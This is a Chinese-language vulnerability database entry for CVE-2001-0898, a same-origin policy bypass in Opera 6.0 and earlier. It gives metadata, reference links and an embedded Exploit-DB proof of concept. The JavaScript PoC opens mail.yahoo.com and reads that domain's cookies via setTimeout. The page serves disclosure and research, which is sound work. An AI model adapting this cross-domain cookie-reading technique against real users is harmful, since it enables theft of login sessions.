CVE-2001-0898
CVSS5.0
发布时间 :2001-11-15 00:00:00
修订时间 :2016-10-17 22:12:57
NMCOE    

[原文]Opera 6.0 and earlier allows remote attackers to access sensitive information such as cookies and links for other domains via Javascript that uses setTimeout to (1) access data after a new window to the domain has been opened or (2) access data via about:cache.


[CNNVD]Opera Same原始策略规避漏洞(CNNVD-200111-012)

        Opera 6.0及其早期版本存在漏洞。远程攻击者可以借助Java脚本使用setTimeout(1)在新窗口域打开后访问数据或(2)借助:cache访问数据来访问如cookies和对其他域链接的敏感信息。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0898
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0898
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200111-012
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=100586079932284&w=2
(UNKNOWN)  BUGTRAQ  20011115 Several javascript vulnerabilities in Opera
http://marc.info/?l=bugtraq&m=100588139312696&w=2
(UNKNOWN)  BUGTRAQ  20011116 Re: Several javascript vulnerabilities in Opera
http://www.iss.net/security_center/static/7567.php
(UNKNOWN)  XF  opera-java-cross-site(7567)
http://www.securityfocus.com/bid/3553
(UNKNOWN)  BID  3553

- 漏洞信息

Opera Same原始策略规避漏洞
中危 访问验证错误
2001-11-15 00:00:00 2005-10-20 00:00:00
远程  
        Opera 6.0及其早期版本存在漏洞。远程攻击者可以借助Java脚本使用setTimeout(1)在新窗口域打开后访问数据或(2)借助:cache访问数据来访问如cookies和对其他域链接的敏感信息。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (21156)

Opera 5.0/5.1 Same Origin Policy Circumvention Vulnerability (EDBID:21156)
windows remote
2001-11-15 Verified
0 Georgi Guninski
N/A [点击下载]
source: http://www.securityfocus.com/bid/3553/info

Opera is a popular, freely available web browser that is supported across many different platforms.

Opera is prone to an issue which may allow for the execution of script code across domains, allowing for circumvention of the web browser's security model. It is possible to construct malicious script code on a webpage, which when executed by Opera web browser, is able to affect another domain.

In short, Opera does not properly implement the "Same Origin Policy" enforced by other browsers.

The danger is that one website may be able to access the cookie-based authentication credentials of another website. 

-1.----------------------------------
a=window.open("http://mail.yahoo.com");
function f()
{
xx=a.document.cookie;
alert("hi"+xx);
a.document.open();
a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.com');setTimeout('z=x.document.cookie;alert(z);',5000)</"+"script>");
a.document.close();
}
setTimeout("f()",5000);
----------------------------------- 		

- 漏洞信息

6274
Opera Javascript Same Origin Bypass
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

2001-11-15 Unknow
2011-11-15 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站